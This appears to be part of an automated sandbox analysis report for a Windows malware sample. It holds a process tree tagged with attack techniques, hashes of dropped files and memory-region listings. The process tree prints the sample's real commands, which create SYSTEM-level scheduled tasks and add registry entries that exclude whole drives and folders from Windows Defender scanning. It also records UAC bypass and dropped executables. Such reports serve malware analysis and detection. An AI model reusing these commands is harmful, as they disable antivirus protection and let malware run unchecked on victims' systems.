                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\3BKYDt\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4940
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3612
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                        PID:3916
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      PID:4944
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:5928
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5532
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4760
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      PID:2412
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3888
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1140
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5200
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      PID:1136
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2520
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3448
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4780
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      PID:3172
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2988
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                          PID:3556
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Delete /TN "Task1" /F
                                          4⤵
                                            PID:4948
                                    • C:\Windows\system32\cmd.exe
                                      "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\v4Sbuu" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:2032
                                      • C:\Windows\System32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\v4Sbuu" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:2820
                                    • C:\Users\Public\v4Sbuu\nrkfjc.exe
                                      "C:\Users\Public\v4Sbuu\nrkfjc.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1932
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe
                                      1⤵
                                        PID:2364
                                      • C:\Windows\system32\cmd.exe
                                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:2204
                                        • C:\Windows\System32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:6028
                                      • C:\Windows\system32\cmd.exe
                                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        • Suspicious use of WriteProcessMemory
                                        PID:572
                                        • C:\Windows\System32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                          2⤵
                                          • Windows security bypass
                                          PID:2092
                                      • C:\Program Files (x86)\3BKYDt\o1NX3q.exe
                                        "C:\Program Files (x86)\3BKYDt\o1NX3q.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:4896
                                      • C:\Program Files (x86)\3BKYDt\o1NX3q.exe
                                        "C:\Program Files (x86)\3BKYDt\o1NX3q.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:2100
                                      • C:\Program Files (x86)\1xY4y\Quna86.exe
                                        "C:\Program Files (x86)\1xY4y\Quna86.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:1808
                                      • C:\ProgramData\HB6rIfmK.exe
                                        "C:\ProgramData\HB6rIfmK.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4564
                                      • C:\ProgramData\3YLUasBo\GrOcS3OF.exe
                                        "C:\ProgramData\3YLUasBo\GrOcS3OF.exe"
                                        1⤵
                                        • UAC bypass
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Modifies registry class
                                        • Suspicious use of SetWindowsHookEx
                                        • System policy modification
                                        PID:4276
                                      • C:\Program Files (x86)\3BKYDt\o1NX3q.exe
                                        "C:\Program Files (x86)\3BKYDt\o1NX3q.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:2676
                                      • C:\Program Files (x86)\1xY4y\Quna86.exe
                                        "C:\Program Files (x86)\1xY4y\Quna86.exe"
                                        1⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:2564
                                      • C:\ProgramData\ZlLbRw0o\yHDc9ZDz.exe
                                        "C:\ProgramData\ZlLbRw0o\yHDc9ZDz.exe" 1776
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2272
                                      • C:\Windows\system32\cmd.exe
                                        "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\3BKYDt" /t REG_DWORD /d 0 /f
                                        1⤵
                                        • Executes a command shell one-liner
                                        PID:5484
                                        • C:\Windows\System32\reg.exe
                                          reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\3BKYDt" /t REG_DWORD /d 0 /f
                                          2⤵
                                            PID:4900
                                        • C:\Windows\system32\cmd.exe
                                          "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                          1⤵
                                          • Executes a command shell one-liner
                                          PID:4820
                                          • C:\Windows\System32\reg.exe
                                            reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                            2⤵
                                              PID:3276
                                          • C:\Windows\system32\cmd.exe
                                            "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                            1⤵
                                            • Executes a command shell one-liner
                                            PID:3080
                                            • C:\Windows\System32\reg.exe
                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                              2⤵
                                                PID:5400
                                            • C:\Windows\system32\cmd.exe
                                              "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                              1⤵
                                              • Executes a command shell one-liner
                                              PID:6132
                                              • C:\Windows\System32\reg.exe
                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                2⤵
                                                  PID:2296
                                              • C:\Windows\system32\cmd.exe
                                                "cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                1⤵
                                                • Executes a command shell one-liner
                                                PID:1688
                                                • C:\Windows\System32\reg.exe
                                                  reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                  2⤵
                                                    PID:2436

                                                Network

                                                      MITRE ATT&CK Enterprise v16

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      XPSPLOG.dll

                                                      • Path C:\Program Files (x86)\1xY4y\XPSPLOG.dll
                                                      • Size 4.6MB
                                                      • SHA256 37968047ac6492bc510d765e12be54e9510ce4c11acf1822eaf6ee71bd32388b
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      image.png

                                                      • Path C:\Program Files (x86)\1xY4y\image.png
                                                      • Size 4.8MB
                                                      • SHA256 a10458bae16cc2abd90637efa1347114bceab60085b7cd420756aea6b5d0a040
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      XPSPLOG.dll

                                                      • Path C:\Program Files (x86)\3BKYDt\XPSPLOG.dll
                                                      • Size 4.6MB
                                                      • SHA256 3ddd30f4dc59ce02b12c2370184fb3f563a566ea3735d05efb61956c5753257b
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      image.png

                                                      • Path C:\Program Files (x86)\3BKYDt\image.png
                                                      • Size 4.8MB
                                                      • SHA256 207038b19110e8ea3a60b179ba8b4a1ae6ca2e2b717d6be10b306c901e56baec
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      o1NX3q.exe

                                                      • Path C:\Program Files (x86)\3BKYDt\o1NX3q.exe
                                                      • Size 145KB
                                                      • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      thumbs.db

                                                      • Path C:\Program Files (x86)\3BKYDt\thumbs.db
                                                      • Size 358KB
                                                      • SHA256 80110aad11b62fe82202954e9e1c9d0cc435f7d729643567f6c43de5ad5ae59a
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      GrOcS3OF.dat

                                                      • Path C:\ProgramData\3YLUasBo\GrOcS3OF.dat
                                                      • Size 56KB
                                                      • SHA256 8cdeb5bc7041b8f5503744d5544f03ad156dd7d20a4a685dc6d454fb59f98261
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      GrOcS3OF.exe

                                                      • Path C:\ProgramData\3YLUasBo\GrOcS3OF.exe
                                                      • Size 475KB
                                                      • SHA256 5cb15571f3bb41d9afcf8e3c1a060587ac91b2ceb9a41a940ca2cea4b9b9606c
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      GrOcS3OF.png

                                                      • Path C:\ProgramData\3YLUasBo\GrOcS3OF.png
                                                      • Size 167KB
                                                      • SHA256 b96dccf210f23112c95bdc9a02203a89866d1bf15b80e74f473b786062deeecd
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      HB6rIfmK.exe

                                                      • Path C:\ProgramData\HB6rIfmK.exe
                                                      • Size 2.5MB
                                                      • SHA256 ce7c1204e2061328bba3933fb2c8d2efdfec87ef07cb9f3f32201f5f9c41b289
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      yHDc9ZDz.exe

                                                      • Path C:\ProgramData\ZlLbRw0o\yHDc9ZDz.exe
                                                      • Size 663KB
                                                      • SHA256 853c02ef93f9baf05bb4066e3d860983b1147fb4d5a7ac853b97a7fb2a5c684a
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                                                      • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                                                      • Size 1KB
                                                      • SHA256 ff517e765714c89d37d1b564ebbcc2b6dfb6a1721a5459746ab87ad3e2a29cb2
                                                      • MD5 SHA1 SHA512 TLSH

                                                      B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                                                      • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                                                      • Size 1KB
                                                      • SHA256 95f210c77caf152cb12c227aa041d2600a2d140537faa4880ada860e0e388789
                                                      • MD5 SHA1 SHA512 TLSH

                                                      D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD

                                                      • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD
                                                      • Size 1KB
                                                      • SHA256 0e57b23c3a3f0a008b793306ac860f05d0cd5eb5cec0fb66aa331e79a9feec9c
                                                      • MD5 SHA1 SHA512 TLSH

                                                      0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B

                                                      • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B
                                                      • Size 508B
                                                      • SHA256 52cee7248533b95942f7d630c6d656c98ec62d7dff9e9ce7675d668d7224c168
                                                      • MD5 SHA1 SHA512 TLSH

                                                      B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240

                                                      • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_FA4759C1FDA1D5B56F6A969553761240
                                                      • Size 510B
                                                      • SHA256 0e0b2750d21c75a01d957339d9730de8f4d5ffd103b7cb1c217bf03b63619ffb
                                                      • MD5 SHA1 SHA512 TLSH

                                                      D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD

                                                      • Path C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D077F3BA01F0F2293C650040B1B80D25_316FB5D99935E27840887D26EA90D4BD
                                                      • Size 540B
                                                      • SHA256 b93a34a5597a0ff525c8d2e770a09baacf5a34598defb35cc89b009db3c2df4a
                                                      • MD5 SHA1 SHA512 TLSH

                                                      StartupProfileData-NonInteractive

                                                      • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      • Size 1KB
                                                      • SHA256 3d6b88b4a750b81a04172fd4a4260c65595418035e8644dd117dbcfd756682d7
                                                      • MD5 SHA1 SHA512 TLSH

                                                      StartupProfileData-NonInteractive

                                                      • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      • Size 20KB
                                                      • SHA256 6d0812eab00924845159bc4fd09af9d71cb51fb5b20062dbf8ecec5ca77acaad
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      __PSScriptPolicyTest_bwfbp5tc.fe1.ps1

                                                      • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bwfbp5tc.fe1.ps1
                                                      • Size 60B
                                                      • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                                      • MD5 SHA1 SHA512 TLSH

                                                      destopbak.ini

                                                      • Path C:\Users\Public\Music\destopbak.ini
                                                      • Size 2B
                                                      • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                                      • MD5 SHA1 SHA512

                                                      UxEnhance64.dll

                                                      • Path C:\Users\Public\v4Sbuu\UxEnhance64.dll
                                                      • Size 3.1MB
                                                      • SHA256 431df3fdda6fab12d5b6fa0829ed9ae99b0ce638a28e80c08be4cfa69bfdf480
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      adoresd.dat

                                                      • Path C:\Users\Public\v4Sbuu\adoresd.dat
                                                      • Size 4.7MB
                                                      • SHA256 6bb32e2dc6be330531033a6bbafab8287340645fc3ef2784db1d4ba062af29cb
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      msadox.tb

                                                      • Path C:\Users\Public\v4Sbuu\msadox.tb
                                                      • Size 8KB
                                                      • SHA256 80cc07389ac9e363a323238fd4f1c04e6c7534724eb0c5d0dc1bc52eeab49dbc
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      nrkfjc.exe

                                                      • Path C:\Users\Public\v4Sbuu\nrkfjc.exe
                                                      • Size 135KB
                                                      • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                                      • MD5 SHA1 SHA512 SSDEEP TLSH

                                                      xxxx.ini

                                                      • Path \??\c:\xxxx.ini
                                                      • Size 2B
                                                      • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                                      • MD5 SHA1 SHA512

                                                      memory/616-617-0x0000020DD0350000-0x0000020DD035A000-memory.dmp

                                                      memory/616-616-0x0000020DD05F0000-0x0000020DD06A2000-memory.dmp

                                                      memory/616-615-0x0000020DD0330000-0x0000020DD034E000-memory.dmp

                                                      memory/616-608-0x0000020DD0290000-0x0000020DD02B2000-memory.dmp

                                                      memory/1808-777-0x0000000003480000-0x0000000003C5D000-memory.dmp

                                                      memory/1808-783-0x0000000000D60000-0x0000000000D61000-memory.dmp

                                                      memory/1808-779-0x0000000001210000-0x0000000001211000-memory.dmp

                                                      memory/1808-768-0x0000000000D60000-0x0000000000D61000-memory.dmp

                                                      memory/1808-769-0x0000000073CE0000-0x000000007442A000-memory.dmp

                                                      memory/1808-780-0x0000000003480000-0x0000000003C5D000-memory.dmp

                                                      memory/1932-586-0x000002C265E00000-0x000002C266687000-memory.dmp

                                                      memory/1932-578-0x000002C265E00000-0x000002C266687000-memory.dmp

                                                      memory/1932-589-0x00007FFCD6390000-0x00007FFCD6392000-memory.dmp

                                                      memory/1932-587-0x000002C265E00000-0x000002C266687000-memory.dmp

                                                      memory/1932-588-0x000002C265E00000-0x000002C266687000-memory.dmp

                                                      memory/1932-585-0x000002C265E00000-0x000002C266687000-memory.dmp

                                                      memory/1932-580-0x00007FFCD63A0000-0x00007FFCD63A2000-memory.dmp

                                                      memory/1932-581-0x000002C265E00000-0x000002C266687000-memory.dmp

                                                      memory/1932-574-0x00007FFCB3710000-0x00007FFCB3C2E000-memory.dmp

                                                      memory/2100-761-0x0000000003090000-0x000000000386D000-memory.dmp

                                                      memory/2100-774-0x00000000006B0000-0x00000000006B1000-memory.dmp

                                                      memory/2100-760-0x0000000000B40000-0x0000000000B41000-memory.dmp

                                                      memory/2100-740-0x00000000006B0000-0x00000000006B1000-memory.dmp

                                                      memory/2100-742-0x00000000750B0000-0x00000000757FA000-memory.dmp

                                                      memory/2100-751-0x0000000003090000-0x000000000386D000-memory.dmp

                                                      memory/2128-904-0x0000000007A90000-0x000000000810C000-memory.dmp

                                                      memory/2128-886-0x0000000005C10000-0x0000000005C76000-memory.dmp

                                                      memory/2128-891-0x0000000006180000-0x00000000061CC000-memory.dmp

                                                      memory/2128-913-0x00000000076C0000-0x0000000007756000-memory.dmp

                                                      memory/2128-894-0x0000000007290000-0x00000000072C6000-memory.dmp

                                                      memory/2128-895-0x000000006F140000-0x000000006F18C000-memory.dmp

                                                      memory/2128-888-0x0000000005C80000-0x0000000005FDB000-memory.dmp

                                                      memory/2128-902-0x00000000072F0000-0x0000000007310000-memory.dmp

                                                      memory/2128-903-0x0000000007310000-0x00000000073B3000-memory.dmp

                                                      memory/2128-890-0x00000000060D0000-0x00000000060EE000-memory.dmp

                                                      memory/2128-885-0x00000000054A0000-0x0000000005506000-memory.dmp

                                                      memory/2128-879-0x0000000005400000-0x0000000005422000-memory.dmp

                                                      memory/2128-905-0x0000000007450000-0x000000000746A000-memory.dmp

                                                      memory/2128-877-0x0000000005550000-0x0000000005B9A000-memory.dmp

                                                      memory/2128-912-0x00000000074C0000-0x00000000074CA000-memory.dmp

                                                      memory/2128-876-0x00000000028B0000-0x00000000028E6000-memory.dmp

                                                      memory/2272-867-0x00007FF764760000-0x00007FF764B8F000-memory.dmp

                                                      memory/2272-893-0x00007FF764760000-0x00007FF764B8F000-memory.dmp

                                                      memory/2676-831-0x00000000750B0000-0x00000000757FA000-memory.dmp

                                                      memory/2676-830-0x0000000000890000-0x0000000000891000-memory.dmp

                                                      memory/2676-844-0x0000000003250000-0x0000000003A2D000-memory.dmp

                                                      memory/2680-540-0x00007FFCD63A0000-0x00007FFCD63A2000-memory.dmp

                                                      memory/2680-562-0x0000022A95680000-0x0000022A9570A000-memory.dmp

                                                      memory/2680-567-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-559-0x0000022A95680000-0x0000022A9570A000-memory.dmp

                                                      memory/2680-547-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-563-0x0000022A95680000-0x0000022A9570A000-memory.dmp

                                                      memory/2680-532-0x00007FFCD6390000-0x00007FFCD6392000-memory.dmp

                                                      memory/2680-533-0x00007FFCB3710000-0x00007FFCB3C2E000-memory.dmp

                                                      memory/2680-538-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-541-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-566-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-545-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-558-0x0000022A942B0000-0x0000022A942FE000-memory.dmp

                                                      memory/2680-548-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-546-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-552-0x0000022A94D60000-0x0000022A955E7000-memory.dmp

                                                      memory/2680-560-0x0000022A95680000-0x0000022A9570A000-memory.dmp

                                                      memory/3528-922-0x0000000007780000-0x0000000007791000-memory.dmp

                                                      memory/3528-915-0x000000006F140000-0x000000006F18C000-memory.dmp

                                                      memory/4232-0-0x0000000000480000-0x000000000048E000-memory.dmp

                                                      memory/4232-527-0x00007FFCCC030000-0x00007FFCCC042000-memory.dmp

                                                      memory/4232-526-0x0000000000480000-0x000000000048E000-memory.dmp

                                                      memory/4232-1-0x0000000000480000-0x000000000048E000-memory.dmp

                                                      memory/4232-504-0x00007FFCCC030000-0x00007FFCCC042000-memory.dmp

                                                      memory/4232-2-0x00000000004D0000-0x00000000004DC000-memory.dmp

                                                      memory/4276-834-0x0000000003770000-0x0000000003771000-memory.dmp

                                                      memory/4276-809-0x0000000000400000-0x000000000053F000-memory.dmp

                                                      memory/4276-871-0x0000000000400000-0x000000000053F000-memory.dmp

                                                      memory/4276-836-0x0000000010000000-0x000000001002E000-memory.dmp

                                                      memory/4276-840-0x0000000010000000-0x000000001002E000-memory.dmp

                                                      memory/4564-799-0x00000000006C0000-0x0000000000AE7000-memory.dmp

                                                      memory/4580-694-0x00000000030C0000-0x000000000389D000-memory.dmp

                                                      memory/4580-723-0x0000000010000000-0x0000000010061000-memory.dmp

                                                      memory/4580-686-0x00000000750B0000-0x00000000757FA000-memory.dmp

                                                      memory/4580-692-0x0000000000C70000-0x0000000000C71000-memory.dmp

                                                      memory/4580-775-0x00000000030C0000-0x000000000389D000-memory.dmp

                                                      memory/4580-685-0x0000000000C50000-0x0000000000C51000-memory.dmp

                                                      memory/4580-697-0x00000000030C0000-0x000000000389D000-memory.dmp

                                                      memory/4580-704-0x0000000000D70000-0x0000000000D84000-memory.dmp

                                                      memory/4580-718-0x00000000030C0000-0x000000000389D000-memory.dmp

                                                      memory/4580-690-0x00000000030C0000-0x000000000389D000-memory.dmp

                                                      memory/4580-785-0x00000000051F0000-0x0000000005224000-memory.dmp

                                                      memory/4580-727-0x00000000030C0000-0x000000000389D000-memory.dmp

                                                      memory/4896-745-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

                                                      memory/4896-746-0x00000000750B0000-0x00000000757FA000-memory.dmp

                                                      memory/4896-750-0x0000000002EA0000-0x000000000367D000-memory.dmp

                                                      memory/4896-764-0x0000000000E60000-0x0000000000E61000-memory.dmp

                                                      memory/4896-766-0x0000000002EA0000-0x000000000367D000-memory.dmp

                                                      memory/4896-770-0x0000000000AA0000-0x0000000000AA1000-memory.dmp